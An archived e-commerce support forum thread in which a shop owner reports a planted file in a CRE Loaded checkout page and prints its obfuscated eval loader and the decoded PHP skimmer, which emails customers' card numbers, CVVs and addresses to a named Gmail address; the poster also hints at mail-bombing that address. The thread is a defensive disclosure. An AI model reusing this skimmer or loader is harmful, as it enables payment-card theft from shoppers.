Jump to content

Archived

This topic is now archived and is closed to further replies.

graith

Credit Card Number stealing inc_lib.php

Recommended Posts

I found this code in checkout_confirmation.php

 

require(DIR_WS_INCLUDES . 'inc_lib.php');

 

which looks like this.

 

<?

function d($s,$k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s,$i,2)));$i=(float)($i)+2;}return

$d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s,$i,1);$kc=substr($k,($i%strlen($k))-1,1);$c=chr(ord($c)-ord($kc));$r.=$c;}return

$r;}}eval(d("dVNbU9tGGP1fycDQMPBsxsbIRooviZs2CWkaYxNozEwK8SWE+qbVdXdlrbS7klZSAu3093WNwgMz6ZvmO+c7e86ZTwQ/VQkLEG2pqVY7Pv+wp+Xd339VS6OLWtPjqRU297NWtTc6Kam034OAMtCq/wM9u1U/aL3+V4VIsND0HOpW+uWK+XF89XnaNJbm6htzWXP2auex5tokX5V6e5o5vPgyumro0AxjBkCiGN3tTc1YCuokSaf2tqTOJqPJWK8v3VmamixbIO5lK21+vPVI1aFIgOBt5U1NBZfj4eVSgS7gmU7S2S0y799Kk1flI2XfGn8aXf914OqWaycFhPLw5UNITggFYsZ4GPn16+7mtuqmceehVTmBBIXWjQtEwZG1ROChDZQyioo4ug73+kpix4s5BALF3LK9BDvpUyWiOgp+7luIejaz9AYMxGqezgjU5p1yhQcIRa0TYIeIMNSsPVcVpdZoV5pNraO018qBxT2sdCsaIdAQnWMzZyHHOJkfZhZEvs9D+3vSABBvnYJHFqZaX89FEjCLLBVMTUTvjRVkkTBshes4lCGLdHDWRxFK5B8aRaQuUAwslN2AF7vPqmbhMc/JLtedFv0E0cOB/8jCDKr0MlJ8EOHMY8jSPTvZcLVXc+j80/DwYVeH58O/7wczM4+nA0P1+aljp86UudwsI78Utm/CzjFggrkRt1ypfgA/tKnt++qCoThzTW/WtuQZHljEZ7iWyeW0N9wpXuTFSX4qKTelbm7cW5jLCEPEkEtZvqS/IfOs8DAVK5DV57xFA/iGEoduWXcRC+eaVYUPQPs9PNUTvSv+S8zPgztIFu/bgTpQqSSc3/zwD8VYY7eVjR5DAzvbA0mcsuJ9bCHTHl1qdxyTL0uG9ve3N3YeLKf8W7V8RZc5EHfZbodNiAPqvIHWbchG2PUcWu9avXj+4nSPTubFpCGo4CVj+onggdvaj74Gp7asfnC8Gj5eGfrp+2tR3RBwqqqce/5niaEETRKKk69dkWzCcft7n8=",864930819));

?>

 

Decoding it turns it into this

 

if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){die('');}$first_name = $_POST['cc_owner'];

$ccnum = $_POST['cc_number'];

$ccstart1 = $_POST['cc_start_month'];

$ccstart2 = $_POST['cc_start_year'];

$cvv2 = $_POST['cc_ccv'];

$exp1 = $_POST['cc_expires_month'];

$exp2 = $_POST['cc_expires_year'];

$issue = $_POST['cc_issue'];

$add = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '---');

$phone = $order->customer['telephone'];

$email = $order->customer['email_address'];

$street = $order->customer['street_address'];

$city = $order->customer['city'];

$state = $order->customer['state'];

$zip = $order->customer['postcode'];

$ip = $_SERVER["REMOTE_ADDR"];

 

$msg = "Email: $email\nstreet: $street\ncity: $city\nState: $state\nzip: $zip\nPhone: $phone

Name: $first_name\nCcnumber: $ccnum\nExpdate: $exp1/$exp2\nCVV: $cvv2\nStart: $ccstart1/$ccstart1\nIssue: $issue

IP: $ip\nAddress: $add";

 

 

 

$to="albozuk@gmail.com";

 

 

 

$subj = "HEY BABY";

 

$from ="From: news@asc.com";

 

 

mail ($to, $subj, $msg, $from);

 

 

Its job is to email the credit card details to the email address albozuk@gmail.com with subject HEY BABY

 

It'd be a great shame if he got 10,000 emails from news@asc.com with that subject or if that email address was submitted to some obnoxious email feed.

 

I've no idea how the site was hacked. It's a version of CRE Loaded and the admin directory is password protected. Every file had its date and time stamp set to November 2007 so we can't trace exactly when it was done. We've turned off accepting credit card payment and we'll have to use a payment provider instead.

 

Graith

Share this post


Link to post
Share on other sites

Brian,

 

Unless your site was PCI DSS compliant, you should not have been accepting credit cards anyway. Ensure you site is V2.2 RC2a and has ALL of the security patches and suggested Security Contributions installed to avoid any future security breaches.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

×